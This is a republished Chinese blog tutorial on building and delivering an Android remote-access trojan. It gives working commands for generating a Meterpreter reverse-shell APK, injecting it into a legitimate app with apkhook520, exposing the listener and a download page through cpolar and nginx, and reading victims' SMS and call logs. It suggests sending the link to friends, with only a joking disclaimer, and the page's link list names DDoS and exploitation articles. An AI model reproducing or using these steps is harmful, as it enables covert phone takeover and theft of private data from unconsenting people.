kali使用msf+apkhook520+cploar实现安卓手的攻击

这篇具有很好参考价值的文章主要介绍了kali使用msf+apkhook520+cploar实现安卓手的攻击。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

学习网络安全的过程中,突发奇想怎么才能控制或者说是攻击手机
边找工作边实验

话不多说启动kali

一、使用msf+apktool生成简单的木马程序

首先使用kali自带的msfvenom写上这样一段代码
选择安卓 kali的ip 一个空闲的端口 要输出的文件名

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.7(kali的地址) LPORT=4444(任意空闲端口) -o aaa.apk(自定义文件名称)

接着我们就会得到一个木马安装包
但是现在的安装包安装时会提示你你这是为旧版本打造的无法安装
所以要使用到apktool工具进行反编译,修改安装包的版本
apktool也是kali自带的工具如果没有的话可自行下载
使用这段代码 选择要反编译的文件   生成文件夹的名字 

apktool d aaa.apk(生成的文件) -o aaa(自定义反编译后的文件夹名称)

之后进入生成的文件夹中打开apktool.yml

kali使用msf+apkhook520+cploar实现安卓手的攻击,网络
将这里改为16 和23 保存退出

然后将文件打包生成apk文件

 apktool b aaa(修改后的文件夹) -o bbb.apk(自己命名要生成的文件名称)

由于反编译后会 失去签名,我们还需要给新的安装包签名
这里使用的是java自带的标准库keytool先来生成签名证书

keytool -genkeypair -alias sss(签名证书的别名) -keyalg RSA -validity 100 -keystore sss.jks

kali使用msf+apkhook520+cploar实现安卓手的攻击,网络

最后对apk文件进行签名,输入命令

jarsigner -verbose -keystore sss.jks(签名文件的名称) -signedjar hhh.apk(要生成签名包的名称)

bbb.apk(未签名的包名称) sss(签名证书的别名)

你会发现kali中没有这个命令很尴尬,我也很头痛后来发现,jarsigner 没有这款工具的最终原因是因为没有安装jdk软件包

方法:命令:apt-get update

            命令:apt-get upgrade

            命令:apt-get install openjdk-11-jdk-headless
你也可以在windows中完成对安装包的反编译和签名
可以在这里下载但是必须要有jdk环境 https://ibotpeaches.github.io/Apktool/
使用的时候将木马安装包和下载好后的软件放在同一文件夹下在cmd中执行命令即可例如反编译:

kali使用msf+apkhook520+cploar实现安卓手的攻击,网络
反编译和打包的命令只需要将apktool改为java -jar 你的jar包名

现在可以将生成好的安装包安装到手机上并且关掉手机上的所有防护,无视风险安装

在kali中输入msfconsole命令回车

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.0.7    //和之前生成木马的IP一样
set LPORT 4444    //和之前生成木马的端口一样
run

输入以上代码开始监听 监听到之后输入help查看可以使用的命令
给程序打开权限命令才能生效

但是这样显得很呆让我们重新开始玩点花的

二、完整的流程

1.内网穿透cploar的使用

需要使用到cploar内网穿透工具可以去官网下载,官网有安装教程

如果使用的是免费版本那么域名是有时间限制的会随机变化

开启cploar后可以使用127.0.0.1/9200进入cploar后台管理页面

kali使用msf+apkhook520+cploar实现安卓手的攻击,网络

选择创建隧道-隧道名称可以随意填写-协议选择http-选择80端口因为nginx默认使用80端口提供服务(你使用nginx哪个端口提供服务这里就写哪个端口)-地区短则china VIP

kali使用msf+apkhook520+cploar实现安卓手的攻击,网络

再创建一个隧道这里我们选择tcp地址选择你木马监听的地址

kali使用msf+apkhook520+cploar实现安卓手的攻击,网络

这里我们可以看到cploar随机生成的域名

2.配置nginx

之后进入nginx的sites-available/default或者nginx.cof写上配置
我们需要展示一个可以下载的文件页面
为了确保可以访问可以进入到nginx.conf文件中将user www-data 更改为user root
让nginx以root身份运行这样nginx就能访问root用户创建的文件

server {
    listen 80;
    listen 192.168.0.7(kali的地址);
    root /你需要展示的目录
    location / {
        autoindex on; 开启下载目录
    }
}

配置完成后可以使用cploar提供的随机域名访问看看是否完成内网穿透并可以下载文件
kali使用msf+apkhook520+cploar实现安卓手的攻击,网络

3.apkhook520的使用

建议:最好使用我提供的连接下载因为大家都用520apkhook我觉的很坑也许是我不会用,反正它没有python文件并且其他人提供文件的也坑各种报错解码不对,路径不对,各种问题光是修改代码就浪费了我大把时间

接下来需要apkhook520工具 可以在这里拉去里面也有作者制作的详细的使用教程
        https://gitee.com/stemmm/apkhook520

在kali中执行以下代码拉取apkhook520

git clone https://gitee.com/stemmm/apkhook520.git

完成后去下载一个正常的apk包我是在豌豆荚中下载了一个老版本的软件一些新版本的软件最后生成后会闪退可能是因为这个工具比较老

然后将apk上传都kali中使用以下代码直接给软件包加马

python main.py --lhost 21.tcp.cpolar.top:10768(这里使用cploar提供的tcp协议的随机域名) --lport 4444(与cploar填写的端口要一直否则无法访问到)  -n ../106_f827d9dd45d90b6dc25e3a76129cf404.apk(正常的安装包)

kali使用msf+apkhook520+cploar实现安卓手的攻击,网络

等待运行完成后将远控apk发送至手机或者你可以直接访问你的网页下载安装包

4.使用mt管理器签名

还需要在手机中下载一个mt管理器
kali使用msf+apkhook520+cploar实现安卓手的攻击,网络
MT管理器2024最新版下载-MT管理器app官方版下载v2.15.0 安卓版-火鸟手游网

kali使用msf+apkhook520+cploar实现安卓手的攻击,网络

kali使用msf+apkhook520+cploar实现安卓手的攻击,网络

kali使用msf+apkhook520+cploar实现安卓手的攻击,网络 

这里选择签名方案然后确定直接就会自动签名,之后将新生成的安装包无视风险安装安装

5.使用msfconsole监听

接着进入kali执行以下代码

msfconsole -r WorkDir/handler.rc(根据你现在的位置路径要写正确)

kali使用msf+apkhook520+cploar实现安卓手的攻击,网络

它会自动的读取handler.rc文件并设置好监听模式如上图所示

kali使用msf+apkhook520+cploar实现安卓手的攻击,网络

输入sessions命令可以看到它已经监听到并开启了一个会话
输入命令sessions 1进入会话
kali使用msf+apkhook520+cploar实现安卓手的攻击,网络

在这里可以使用相应的命令例如:dump_sms可以查看短信  dump_calllog可以查看通过话记录 它会将读取到的内容以文件形式存储可以使用cat命令查看
kali使用msf+apkhook520+cploar实现安卓手的攻击,网络

kali使用msf+apkhook520+cploar实现安卓手的攻击,网络

更多的命令可以使用help命令查看

好了现在你可以把你的网址发给你的朋友让你的好朋友下载你的加马软件,然后就可以为所欲为了
开个玩笑大家绿色上网,这些都是自己娱乐的切记不要干违法的事情

有很多东西还需要解决,比如说安装时报毒,软件使用的老版本的通常安装之后需要更新否则不让使用,还有就是权限问题还有很多东西需要学习!玩的开心文章来源地址https://www.toymoban.com/news/detail-855707.html

到了这里,关于kali使用msf+apkhook520+cploar实现安卓手的攻击的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 使用Kali对网站进行DDos攻击

    记录我第一次ddos攻击。 准备阶段: 1.攻击对象 在腾讯云服务器上部署好要攻击的网站。我用的是自己做的一个springboot项目,端口为8081。  2.攻击发起者 装有Kali系统的虚拟机(如何安装自行查找),装好否的界面如下图。 攻击开始: 1.在kali系统上打开命令行窗口 2.输入以下

    2024年02月05日
    浏览(55)
  • DHCP饿死攻击及防御(基于ENSP模拟器、Kali攻击机实现)

    ·Kali攻击机一台 ·ENSP模拟器         实验说明: ·通过配置DHCP_Server,使得192.168.150.0/24子网内的终端能够自动获取IP地址及DNS ·通过配置SW交换机,开启DHCP Snooping功能,用于保证DHCP客户端从合法的DHCP服务器获取IP地址 ·Kali攻击机接入192.168.150.0/24内网中,获取内网IP地址,使

    2024年02月09日
    浏览(35)
  • 网络安全kali web安全 Kali之msf简单的漏洞利用

    靶机的IP地址为:192.168.173.136 利用nmap工具扫描其开放端口、系统等 整理一下目标系统的相关信息 系统版本:Windows server 2003 开放的端口及服务: 从扫描出的端口发现,目标主机开启了135端口,服务为msrpc(远程过程调用服务),即Windows的RPC服务。 ​针对这个服务,我们就可

    2024年02月09日
    浏览(43)
  • 如何使用kali操作系统进行ddos攻击

    注意:本文只作为教学目的,如容拿去做违法乱纪的事于作者无关,继续阅读则代表同意。 1.首先,你需要有一台kali的操作系统。 2.打开虚拟机 3.打开左上角的终端  //就是这个。 4.输入  sudo -i   //获得root权限 5.输入  git clone https://github.com/Andysun06/ddos //获得ddos攻击的数据

    2024年02月02日
    浏览(43)
  • Kali Linux利用MSF渗透Windows11电脑

    目录 一、MSF简介 渗透环境 二、渗透流程 1.Kali Linux进入Root模式  2.生成可执行文件 3.运行msfconsole命令  4.配置参数  5.在靶机Windows11打开可执行文件 6.渗透 Msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 MSFvenom是Msfpayloa

    2024年02月06日
    浏览(44)
  • Kali系统MSF模块暴力破解MySQL弱口令漏洞

    攻击环境使用KALI系统(使用虚拟机搭建)的Metasploit模块,msfconsole是metasploit中的一个工具,它集成了很多漏洞的利用的脚本,并且使用起来很简单的网络安全工具。 这里要特别强调:被攻击的环境必须开启mysql远程登陆服务,通常MySQL开启的端口号是3306,故而一般情况下要求

    2023年04月10日
    浏览(59)
  • Kali之MSF的MS08-067漏洞复现详解

    MSF即Metasploit Framework,是一个综合性的渗透测试工具,集成信息收集、漏洞扫描、漏洞利用以及提权等功能的工具。 目前安装的kali都自带MSF,可以直接在图形界面打开 也可以在kali的终端通过使用命令msfconsole来打开。 1)msf的安装目录: ┌──(kali㉿kali)-[~] └─$ ls /usr/shar

    2023年04月08日
    浏览(51)
  • msf --攻击MySQL 和简单实用

    Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中

    2024年02月05日
    浏览(36)
  • Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)

    一、永恒之蓝概述 二、SMB协议 三、准备工作 四、漏洞复现 1、主机发现 2、端口扫描 3、利用模块 五、演示功能 1.获取cmd 2.捕获屏幕 3.上传文件 4.下载文件 5.远程登录 6.上传后门 7.免杀加壳 8.运行wannacry 9.清除日志 六、预防方案 1.打开防火墙 2.安装杀毒软件 3.禁用445端口 

    2023年04月16日
    浏览(50)
  • MSF入侵安卓手机

    MSF是Metasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大,分别有Windows版和Linux版,工具里集成了许多微软公布的漏洞(0day)。 我这里做测试的系统是Backbox linux ,这是一款网络渗透,信息安全评估系统。里边安装了许许多多的工具。其中MSF就自带有。当然还有

    2024年02月06日
    浏览(41)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包